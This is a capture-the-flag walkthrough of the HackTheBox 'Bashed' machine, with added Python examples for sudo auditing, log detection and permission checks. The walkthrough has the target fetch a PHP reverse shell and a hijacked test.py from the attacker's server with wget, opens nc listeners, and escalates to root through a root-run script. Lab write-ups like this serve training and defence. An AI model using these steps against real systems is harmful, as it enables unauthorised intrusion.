
HTB BASHED WALK-THROUGH


HackTheBox is an excellent platform for pen-testers to improve their testing skills and knowledge.
Machine Level - Easy
Machine Name - Bashed
Machine OS - Linux
Machine IP - 10.10.10.68
Tools:
Nmap - Nmap is a fantastic tool for scanning open ports, services and OS detection. You can use tools other than nmap (whichever you are more comfortable with) like masscan, SPARTA etc. to scan for open ports.
Method:
The first step is always to scan the machine, so start an nmap scan with the command
sudo nmap -sSVC 10.10.10.68
This will scan for open ports and services on the host.
We see that only one port is open (port 80) and it is running an Apache server.
Let's visit the site 10.10.10.68
We see that there is a lot of content about "phpbash". That's some useful information.
Click around to see if you find something useful.
There's nothing much to see here. So let's use 'DirBuster' for directory busting and see if we find something interesting.
We see a phpbash.php page in the dev folder.
Let's visit this page.
There is a bash-like web interface; move around and grab the user flag. As you can see from the whoami command, we are not root, so we cannot grab the root flag right away.
Let's try and see if there is a path to higher privileges that needs no password.
Use the command sudo -l
We can see that we can run commands as scriptmanager with no password.
Try sudo su scriptmanager to see if we can change our privileges.
It fails, and says no tty present.
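The sudo -l step above is also the check a defender would script: any rule that lets an account run commands as another user without a password is a pivot waiting to be used. The following is an added example, not code from the original walkthrough. It parses the text that sudo -l prints (the "(runas_user : runas_group) TAG: command" lines after the "may run the following commands" header) and lists the password-less rules. The sample output is constructed for illustration and the hostname and second rule in it are assumptions.

```python
"""Audit `sudo -l` output for password-less privilege changes.

Added example, not part of the original walkthrough. Given the text that
`sudo -l` prints, list every rule that lets the current account run commands
as another user without a password (the weakness the walkthrough pivots
through: www-data -> scriptmanager). SAMPLE below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Set

# One rule line, e.g. "    (scriptmanager : scriptmanager) NOPASSWD: ALL"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<body>.+?)\s*$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")  # NOPASSWD:, SETENV:, NOEXEC:, ...


@dataclass
class SudoRule:
    runas_user: str
    runas_group: str
    tags: Set[str]
    command: str


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract the rule lines from `sudo -l` output, ignoring the Defaults block."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        user = runas[0]
        group = runas[1] if len(runas) > 1 else ""
        body = m.group("body")
        tags = set()
        # Tags sit between the runas spec and the command list
        while (t := TAG_RE.match(body)):
            tags.add(t.group(1))
            body = body[t.end():]
        rules.append(SudoRule(user, group, tags, body.strip()))
    return rules


def password_less_pivots(output: str) -> List[str]:
    """Return 'runas_user: command' for every rule that needs no password."""
    return [f"{r.runas_user}: {r.command}"
            for r in parse_sudo_l(output) if "NOPASSWD" in r.tags]


# Constructed sample in the shape of `sudo -l` output (hostname and the
# second rule are assumptions, not taken from the box).
SAMPLE = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for hit in password_less_pivots(SAMPLE):
        print("password-less rule:", hit)
```

Run this over the sudo -l output of each service account (www-data here) as part of a host review; a web server account that can become any other user without a password is a finding regardless of whether the web application itself is vulnerable.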
Let's see if we find something more useful in DirBuster; we can see an uploads folder. Seems like we can upload files here. Let's visit this page.
It is blank. But we can upload files here.
Let's see if we can upload a PHP file and get a reverse shell.
Search for "php reverse shell" on Google.
Click on this one.
Scroll down to see the download link for the PHP file.
It says we need to make some changes in the file. Let's download this and extract it.
Open the PHP file, make the modification and save it with a name of your choice (mine is rev.php).
We need to make the changes here.
Put your own IP here. (If you want to change the port you can; I am using the same one.)
Now, we need to upload the file to the machine.
First let's host a server on our side.
Use the command sudo python -m SimpleHTTPServer 80
(we are hosting our server on port 80)
Now we need to download the file: first change the directory to the uploads folder and then use the command wget http://10.10.14.2/Desktop/rev.php
(this command tells the target to download (wget) the PHP file from our IP address; we also provide the path of the PHP file to be uploaded.)
Transfer successful. Let's just verify that it is there.
It's there; now we need a listening port on our side. Use the netcat command to set up the listener: nc -nvlp 1234
Now we need to run the PHP file.
Now, see if you get a reverse shell.
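Everything in the upload-and-execute sequence above leaves ordinary entries in the web server's access log: a request to the phpbash page, then a request for a .php file under /uploads/. The block below is an added example, not code from the original walkthrough, showing the detection logic run over constructed Apache combined-format log lines. The directory name /uploads/, the page /dev/phpbash.php and the file name rev.php come from the walkthrough; the timestamps, sizes and the other paths are made up.

```python
"""Flag script execution from an upload directory in Apache access logs.

Added example, not part of the original walkthrough. The box executed files
placed in /uploads/ as PHP and exposed /dev/phpbash.php; both leave plain
traces in the combined access log. SAMPLE_LOG is constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Apache "combined" format up to the response size; referer/UA are ignored
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/uploads/",)                       # assumption: where users may write
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # extensions mod_php may execute
SHELL_MARKERS = ("phpbash",)                       # web-shell name seen on this box


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an access-log entry deserves attention (may be empty)."""
    path = entry["path"].split("?", 1)[0].lower()   # compare the path only
    reasons = []
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXT):
        reasons.append("script executed from upload directory")
    if any(marker in path for marker in SHELL_MARKERS):
        reasons.append("web shell page requested")
    return reasons


def detect(lines: List[str]) -> List[Tuple[str, str, str, List[str]]]:
    """(client ip, path, status, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue                                # malformed line, skip it
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], entry["status"], reasons))
    return hits


# Constructed log lines mirroring the walkthrough's sequence of requests
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2018:10:01:02 +0000] "GET / HTTP/1.1" 200 7743 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Jan/2018:10:02:11 +0000] "GET /dev/phpbash.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Jan/2018:10:05:40 +0000] "GET /uploads/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Jan/2018:10:06:03 +0000] "GET /uploads/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [01/Jan/2018:10:06:30 +0000] "GET /uploads/photo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, path, status, reasons in detect(SAMPLE_LOG):
        print(f"{ip} {status} {path}: {', '.join(reasons)}")
```

The matching fix on the server side is to make sure files in the upload directory are never handed to the PHP interpreter (for mod_php, `php_admin_flag engine off` in a `<Directory>` block for the uploads path), so a successful upload stays a stored file rather than code execution.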
We are connected. But the shell is still unstable.
Let's see if we can spawn a tty shell.
Search for "tty escape" on Google.
Visit this one.
Replace sh with bash and run it in the opened shell.
It's imported; now let's escape to a tty shell and see if we can change our privilege.
Now we are scriptmanager. Verify it with the command whoami
Now we need to find a way to become root.
Do ls -la and see if you find some unusual directory.
We see that all the others require root privileges except one named scripts.
Change directory to scripts and see what is in the directory.
There are two files named test: one is a Python file owned by scriptmanager and the other a text file owned by root. Let's see what's in the test.py file.
If you look at the modification time of the test.txt file, it's the current time. This means that test.py is being run and its output is written to test.txt with root privileges. Let's exploit this.
Let's search for "python reverse shell" on Google.
Let's visit this one.
Now copy everything except python -c
Paste it in a new file (named test.py)
We need to make changes in here:
 1) change the listening IP and port
 2) change sh to bash
Save the file.
Now we need to create a new listening port.
Use the nc -nvlp 2345 command to start a netcat listener.
Now let's host the server for the file upload.
Use sudo python -m SimpleHTTPServer 80
Now let's grab the test file. But before that we need to remove the existing test.py file, else our file will get renamed.
Use the command rm test.py to delete the existing file.
Now use the command wget http://10.10.14.2/test.py
to grab the test.py file.
Run the test.py file and see the netcat terminal.
Try cd /root; now you can access root. Grab the root flag.
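The root step works because root keeps executing a file that scriptmanager owns, in a directory scriptmanager owns, so the file can simply be deleted and replaced. That is a filesystem property a host audit can check. The block below is an added example, not code from the original walkthrough: given paths that root is known to execute (the list is an input, taken from cron entries, sudo rules or service files, not discovered here), it reports any that a non-root account could edit or replace. The decision logic is a pure function so it can be exercised with made-up ownership and mode values; the demo creates a throwaway file in a temporary directory rather than touching /scripts.

```python
"""Find scripts that root executes but that a non-root user can change.

Added example, not part of the original walkthrough. On this box root ran
/scripts/test.py while both the file and the directory belonged to
scriptmanager, so replacing the file meant code execution as root.
`is_root_hijackable` is pure (uid and st_mode values in, verdict out);
`audit_paths` applies it to real paths; `demo` runs it on a temp file.
"""
import os
import stat
import tempfile
from typing import List, Tuple

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def is_root_hijackable(script_uid: int, script_mode: int,
                       dir_uid: int, dir_mode: int) -> Tuple[bool, str]:
    """Could a non-root user change what root will execute at this path?

    Arguments are st_uid/st_mode of the script and of its directory.
    """
    if script_uid != 0:
        return True, "script owned by a non-root user"
    if script_mode & GROUP_OR_OTHER_WRITE:
        return True, "script is group- or world-writable"
    if dir_uid != 0:
        return True, "directory owned by a non-root user (file can be deleted and replaced)"
    # A world-writable directory lets anyone unlink and recreate the file
    # unless the sticky bit restricts deletion to the file's owner.
    if (dir_mode & GROUP_OR_OTHER_WRITE) and not (dir_mode & stat.S_ISVTX):
        return True, "directory writable by others without the sticky bit"
    return False, "ok"


def audit_paths(paths: List[str]) -> List[Tuple[str, str]]:
    """Stat each script and its directory; return (path, reason) for risky ones."""
    findings = []
    for p in paths:
        full = os.path.abspath(p)
        try:
            s = os.lstat(full)
            d = os.stat(os.path.dirname(full))
        except FileNotFoundError:
            findings.append((p, "missing: check who can create a file at this path"))
            continue
        if stat.S_ISLNK(s.st_mode):
            findings.append((p, "symlink: the link owner can point it elsewhere"))
            continue
        risky, why = is_root_hijackable(s.st_uid, s.st_mode, d.st_uid, d.st_mode)
        if risky:
            findings.append((p, why))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Audit a throwaway test.py created in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "test.py")
        with open(script, "w") as fh:
            fh.write("print('hello from test.py')\n")
        os.chmod(script, 0o666)          # deliberately loose, so it is flagged
        return audit_paths([script])


if __name__ == "__main__":
    for path, why in demo():
        print(f"{path}: {why}")
```

Anything root runs unattended should be root-owned, not writable by group or world, and live in a root-owned directory; a scheduled job that violates this is equivalent to giving the file's owner root.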
That's all for this machine.

Thanks for reading!
